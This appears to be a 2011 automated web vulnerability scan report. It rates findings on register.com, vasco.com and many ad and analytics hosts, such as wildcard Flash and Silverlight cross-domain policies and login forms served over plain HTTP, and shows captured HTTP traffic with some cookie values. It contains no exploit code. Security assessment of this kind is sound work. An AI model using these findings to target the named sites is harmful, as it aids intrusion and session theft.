Confidence: | Certain |
Host: | http://www.register.com |
Path: | /domain/searchresults |
GET /domain/searchresults Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 200 OK Date: Sat, 03 Sep 2011 22:12:57 GMT HostName: atleuapp04.galt.register X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 Cache-Control: no-cache Pragma: no-cache Set-Cookie: JSESSIONID=71D10E283 P3P: policyref="http://www Content-Type: text/html;charset=ISO Set-Cookie: TSfd06f3=2eebf6c5fd8 Vary: Accept-Encoding, User-Agent Content-Length: 31335 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... prod="";s.products=prod /*for the T&T integration*/ mboxLoadSCPlugin(s); /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.register.com |
Path: | /unauthenticated_session |
GET /unauthenticated_session Host: www.register.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TLTSID=C8693DAAD6731 |
HTTP/1.1 200 OK Date: Sat, 03 Sep 2011 22:14:57 GMT HostName: atleuapp04.galt.register X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1 P3P: policyref="http://www Content-Type: text/html;charset=ISO Vary: Accept-Encoding, User-Agent Content-Length: 23259 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content ...[SNIP]... prod="";s.products=prod /*for the T&T integration*/ mboxLoadSCPlugin(s); /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://adx.adnxs.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: adx.adnxs.com |
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:41:29 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=6422714091563403120 Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ajax.googleapis |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ajax.googleapis.com |
HTTP/1.0 200 OK Expires: Sat, 03 Sep 2011 23:16:57 GMT Date: Fri, 02 Sep 2011 23:16:57 GMT Content-Type: text/x-cross-domain X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Cache-Control: public, max-age=86400 Age: 80212 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bh.contextweb.com |
HTTP/1.1 200 OK X-Powered-By: Servlet/3.0 Server: GlassFish v3 Accept-Ranges: bytes ETag: W/"269-1314729062000" Last-Modified: Tue, 30 Aug 2011 18:31:02 GMT Content-Type: application/xml Content-Length: 269 Date: Sat, 03 Sep 2011 21:33:49 GMT Connection: Keep-Alive P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c.mouseflow.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: c.mouseflow.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 20 Apr 2011 14:02:32 GMT Accept-Ranges: bytes ETag: "3e38109863ffcb1:0" Server: Microsoft-IIS/7.5 Date: Sat, 03 Sep 2011 21:34:45 GMT Connection: close Content-Length: 103 <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: c7.zedo.com |
HTTP/1.0 200 OK Server: ZEDO 3G Content-Length: 247 Content-Type: application/xml ETag: "77adf2-f7-44d91a5da81c0" P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=5087 Date: Sat, 03 Sep 2011 21:40:30 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://cspix.media6d |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: cspix.media6degrees.com |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Accept-Ranges: bytes ETag: W/"288-1225232951000" Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT Content-Type: application/xml Content-Length: 288 Date: Sat, 03 Sep 2011 17:32:22 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-http-request ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d.adroll.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: d.adroll.com |
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Sat, 03 Sep 2011 21:38:09 GMT Content-Type: text/xml Content-Length: 201 Last-Modified: Wed, 24 Aug 2011 20:02:29 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d3.zedo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: d3.zedo.com |
HTTP/1.0 200 OK Server: ZEDO 3G Last-Modified: Mon, 18 May 2009 07:34:56 GMT ETag: "3a9d108-f8-46a2ad4ab2800 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Content-Type: application/xml Content-Length: 248 Date: Sat, 03 Sep 2011 21:40:24 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: d7.zedo.com |
HTTP/1.0 200 OK Server: ZEDO 3G Content-Length: 248 Content-Type: application/xml ETag: "3a9d108-f8-46a2ad4ab2800 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=2079 Date: Sat, 03 Sep 2011 21:40:25 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <!-- Policy file for http://www.zedo.com --> <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ib.adnxs.com |
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 17:34:46 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=6422714091563403120 Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://idcs.interclick |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: idcs.interclick.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT Accept-Ranges: bytes ETag: "df382cb6d57cc1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET P3P: policyref="http://www Date: Sat, 03 Sep 2011 21:34:03 GMT Connection: close Content-Length: 225 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://imagesak |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: imagesak.securepaynet.net |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: max-age=3888000 Date: Sat, 03 Sep 2011 21:46:19 GMT Content-Length: 203 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img1.wsimg.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: img1.wsimg.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT ETag: "05c981fc435c81:f90" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: max-age=3888000 Date: Sat, 03 Sep 2011 21:30:11 GMT Content-Length: 203 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img3.wsimg.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: img3.wsimg.com |
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Mon, 03 Dec 2007 15:49:44 GMT ETag: "05c981fc435c81:f90" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: max-age=3888000 Date: Sat, 03 Sep 2011 21:28:59 GMT Content-Length: 203 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://m.adnxs.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: m.adnxs.com |
HTTP/1.0 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 04-Sep-2011 21:38:28 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=6422714091563403120 Content-Type: text/xml <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://registercom.tt |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: registercom.tt.omtrdc.net |
HTTP/1.1 200 OK Server: Test & Target Content-Type: application/xml Date: Sat, 03 Sep 2011 21:32:02 GMT Accept-Ranges: bytes ETag: W/"201-1313024241000" Connection: close Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT Content-Length: 201 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s.gravatar.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s.gravatar.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Content-Type: text/xml Date: Sat, 03 Sep 2011 21:33:54 GMT Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT Server: nginx X-Cache: HIT Content-Length: 261 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://segment-pixel |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: segment-pixel.invitemedia |
HTTP/1.0 200 OK Server: IM BidManager Date: Sat, 03 Sep 2011 17:32:22 GMT Content-Type: text/plain Content-Length: 81 <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://value.register.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: value.register.com |
HTTP/1.1 200 OK Date: Sat, 03 Sep 2011 21:32:56 GMT Server: Omniture DC/2.0.0 xserver: www264 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.wunderground |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.wunderground.com |
HTTP/1.1 200 OK Date: Sat, 03 Sep 2011 21:40:30 GMT Server: Apache/1.3.33 (Unix) PHP/4.4.0 Last-Modified: Thu, 03 Mar 2011 23:03:36 GMT Accept-Ranges: bytes Content-Length: 201 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://ads.lfstmedia.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: ads.lfstmedia.com |
HTTP/1.1 200 OK Server: nginx/1.0.4 Date: Sat, 03 Sep 2011 21:40:39 GMT Content-Type: text/xml Content-Length: 376 Last-Modified: Sat, 03 Sep 2011 21:33:15 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-dom ...[SNIP]... <allow-access-from domain="*.dmajet.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.lifestreetmedia.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://edge.sharethis.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: edge.sharethis.com |
HTTP/1.0 200 OK Server: nginx/0.8.53 Content-Type: text/xml Content-Length: 330 Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT Accept-Ranges: bytes Date: Sat, 03 Sep 2011 21:36:50 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.meandmybadself.com" /> <allow-access-from domain="*.sharethis.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://login.dotomi.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: login.dotomi.com |
HTTP/1.1 200 OK Date: Sat, 03 Sep 2011 21:32:42 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 X-Name: dmc-s09 Last-Modified: Tue, 08 Sep 2009 04:16:43 GMT ETag: "8d6006f-a1-473093bdbc0c0 Accept-Ranges: bytes Content-Length: 161 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!-- http://*.dotomi.com <cross-domain-policy> <allow-access-from domain="*.dotomi.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://pagead2.googl |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pagead2.googlesyndication |
HTTP/1.0 200 OK P3P: policyref="http://www Content-Type: text/x-cross-domain Last-Modified: Fri, 27 May 2011 17:28:41 GMT Date: Fri, 02 Sep 2011 23:20:19 GMT Expires: Sat, 03 Sep 2011 23:20:19 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 85471 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" /> <allow-access-from domain="*.google.com.ly" /> <allow-access-from domain="*.google.com.mx" /> <allow-access-from domain="*.google.com.my" /> <allow-access-from domain="*.google.com.pe" /> <allow-access-from domain="*.google.com.ph" /> <allow-access-from domain="*.google.com.pk" /> <allow-access-from domain="*.google.com.ru" /> <allow-access-from domain="*.google.com.sg" /> <allow-access-from domain="*.google.com.tr" /> <allow-access-from domain="*.google.com.tw" /> <allow-access-from domain="*.google.com.ua" /> <allow-access-from domain="*.google.com.vn" /> <allow-access-from domain="*.google.de" /> <allow-access-from domain="*.google.dk" /> <allow-access-from domain="*.google.es" /> <allow-access-from domain="*.google.fi" /> <allow-access-from domain="*.google.fr" /> <allow-access-from domain="*.google.it" /> <allow-access-from domain="*.google.lt" /> <allow-access-from domain="*.google.lv" /> <allow-access-from domain="*.google.nl" /> <allow-access-from domain="*.google.no" /> <allow-access-from domain="*.google.pl" /> <allow-access-from domain="*.google.pt" /> <allow-access-from domain="*.google.ro" /> <allow-access-from domain="*.google.se" /> <allow-access-from domain="*.google.sk" /> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="*.ytimg.com" /> <allow-access-from domain="*.2mdn.net" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.doubleclick.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://w.sharethis.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: w.sharethis.com |
HTTP/1.0 200 OK Server: nginx/0.8.53 Content-Type: text/xml Content-Length: 330 Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT Accept-Ranges: bytes X-N: S Date: Sat, 03 Sep 2011 21:33:13 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.meandmybadself.com" /> <allow-access-from domain="*.sharethis.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.godaddy.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.godaddy.com |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" Date: Sat, 03 Sep 2011 21:30:14 GMT Connection: close Content-Length: 150 <?xml version="1.0"?><cross |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.godaddy.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.godaddy.com |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND" Date: Sat, 03 Sep 2011 21:47:31 GMT Connection: close Content-Length: 150 <?xml version="1.0"?><cross |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.youtube |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.youtube-nocookie.com |
HTTP/1.0 200 OK Date: Sat, 03 Sep 2011 17:32:20 GMT Server: Apache Last-Modified: Thu, 01 Sep 2011 18:22:13 GMT ETag: "132-4abe552de3f40" Accept-Ranges: bytes Content-Length: 306 Content-Type: application/xml <?xml version="1.0"?> <!-- http://www.youtube.com <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.youtube.com" /> <allow-access-from domain="s.ytimg.com" /> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://stats.wordpress |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: stats.wordpress.com |
HTTP/1.1 200 OK Server: nginx Date: Sat, 03 Sep 2011 21:36:42 GMT Content-Type: text/xml Connection: close Content-Length: 585 Last-Modified: Wed, 27 Apr 2011 19:00:53 GMT Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://stats.wordpress |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: stats.wordpress.com |
HTTP/1.1 200 OK Server: nginx Date: Sat, 03 Sep 2011 21:36:42 GMT Content-Type: text/xml Connection: close Content-Length: 309 Last-Modified: Mon, 06 Jun 2011 00:17:52 GMT Accept-Ranges: bytes <?xml version="1.0" encoding="utf-8"?> <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*"/> </allow-from> <grant-to> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://value.register.com |
Path: | /clientaccesspolicy.xml |
GET /clientaccesspolicy.xml HTTP/1.0 Host: value.register.com |
HTTP/1.1 200 OK Date: Sat, 03 Sep 2011 21:32:57 GMT Server: Omniture DC/2.0.0 xserver: www68 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <access-policy> <cross-domain-access> <policy> <allow-from http-request-headers="*"> <domain uri="*" /> </allow-from> <grant-to> <resource path="/" include-subpaths="true" /> </ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://vasco.com |
Path: | /login.aspx |
GET /login.aspx?ReturnUrl= Host: vasco.com Proxy-Connection: keep-alive Referer: http://vasco.com/training Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private Date: Sat, 03 Sep 2011 17:35:34 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 24790 <? xml version=1.0" encoding=UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <body> <form name="aspnetForm" method="post" action="login.aspx <div> ...[SNIP]... <td><input name="ctl00$Columns ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://vasco.com |
Path: | /user_registration.aspx |
GET /user_registration.aspx HTTP/1.1 Host: vasco.com Proxy-Connection: keep-alive Referer: http://vasco.com/login User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private Date: Sat, 03 Sep 2011 17:35:44 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 42057 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <body> <form name="aspnetForm" method="post" action="user_registration <div> ...[SNIP]... <p><input name="ctl00$Content$ ...[SNIP]... <p><input name="ctl00$Content ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://bh.contextweb.com |
Path: | /bh/set.aspx |
GET /bh/set.aspx?action Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://login.dotomi.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01 |
HTTP/1.1 200 OK X-Powered-By: Servlet/3.0 Server: GlassFish v3 CW-Server: cw-app602 Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Tue, 28-Aug-2012 21:33:49 GMT; Path=/ Set-Cookie: cwbh1=1931%3B10%2F01 Content-Type: image/gif Date: Sat, 03 Sep 2011 21:33:49 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" Content-Length: 49 GIF89a................... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://l.sharethis.com |
Path: | /pview |
GET /pview?event=pview&source Host: l.sharethis.com Proxy-Connection: keep-alive Referer: http://www.hostnj.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __stid=CqCKBE5ezzUzV |
HTTP/1.1 204 No Content Server: nginx/0.7.65 Date: Sat, 03 Sep 2011 21:36:49 GMT Connection: keep-alive |
Severity: | Medium |
Confidence: | Firm |
Host: | http://omnituremarketing |
Path: | /m2/omnituremarketing |
GET /m2/omnituremarketing Host: omnituremarketing.tt User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.omniture.com |
HTTP/1.1 200 OK pragma: no-cache Content-Type: text/javascript Content-Length: 2488 Date: Sat, 03 Sep 2011 14:43:47 GMT Server: Test & Target var mboxCurrent=mboxFactories ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://omnituremarketing |
Path: | /m2/omnituremarketing/sc |
